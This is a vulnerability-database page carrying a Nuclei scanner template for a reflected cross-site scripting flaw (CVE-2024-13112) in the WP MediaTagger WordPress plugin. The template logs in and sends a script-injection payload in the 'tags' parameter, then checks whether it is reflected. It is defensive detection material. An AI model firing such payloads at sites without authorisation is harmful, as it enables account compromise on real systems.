Lucene search
K

WP MediaTagger <= 4.1.1 - Cross-Site Scripting

🗓️ 06 Jul 2026 03:02:03Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 9 Views

WP MediaTagger up to 4.1.1 has a reflected XSS flaw from unsanitized output, enabling scripts in privileged users via a malicious link.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2024-13112
31 Jan 202506:15
circl
CNNVD
WordPress plugin WP MediaTagger 安全漏洞
31 Jan 202500:00
cnnvd
CVE
CVE-2024-13112
31 Jan 202506:00
cve
Cvelist
CVE-2024-13112 WP MediaTagger <= 4.1.1 - Reflected XSS
31 Jan 202506:00
cvelist
EUVD
EUVD-2024-51353
3 Oct 202520:07
euvd
NVD
CVE-2024-13112
31 Jan 202506:15
nvd
OSV
CVE-2024-13112
31 Jan 202506:15
osv
Patchstack
WordPress WP MediaTagger plugin <= 4.1.1 - Reflected XSS vulnerability
31 Jan 202508:35
patchstack
Positive Technologies
PT-2025-2010
31 Jan 202500:00
ptsecurity
RedhatCVE
CVE-2024-13112
23 May 202507:34
redhatcve
Rows per page
id: CVE-2024-13112

info:
  name: WP MediaTagger <= 4.1.1 - Cross-Site Scripting
  author: Sourabh-Sahu
  severity: medium
  description: |
    WP MediaTagger WordPress plugin <= 4.1.1 contains a reflected cross-site scripting caused by unsanitized parameter output in the page, letting attackers execute malicious scripts in the context of high privilege users, exploit requires user interaction or victim to visit a malicious link.
  impact: |
    Attackers can execute malicious scripts in the context of high privilege users, potentially leading to account compromise or data theft.
  remediation: |
    Update to the latest version of WP MediaTagger plugin that addresses this issue.
  reference:
    - https://wpscan.com/vulnerability/155df231-30ef-47bb-aa91-a7deb1779bd1/
    - https://nvd.nist.gov/vuln/detail/CVE-2024-13112
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2024-13112
    cwe-id: CWE-79
    epss-score: 0.00577
    epss-percentile: 0.43354
    cpe: cpe:2.3:a:phd38:wp_mediatagger:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: phd38
    product: wp_mediatagger
  tags: cve,cve2024,wp-mediatagger,wp,wp-plugin,wordpress,xss,authenticated

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 302'
          - 'contains(header, "wordpress_logged_in")'
        condition: and
        internal: true

  - raw:
      - |
        GET /wp-admin/admin.php?page=mediatagger_database&tags=1"></script><script>alert(document.domain)</script><script> HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "></script><script>alert(document.domain)</script><script>")'
          - 'contains(content_type, "text/html")'
          - 'status_code == 200'
        condition: and
# digest: 490a004630440220662957e47309b7112241895ba0b38fa649b53f06705510ae3a9451fc79e666a402206549e127c9c52b43391c80ed20b8c55a16c2fe9c783a28d6ee5fccd34f42e878:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

05 Feb 2026 08:41Current
7.1High risk
Vulners AI Score7.1
CVSS 3.16.1
EPSS0.00577
SSVC
9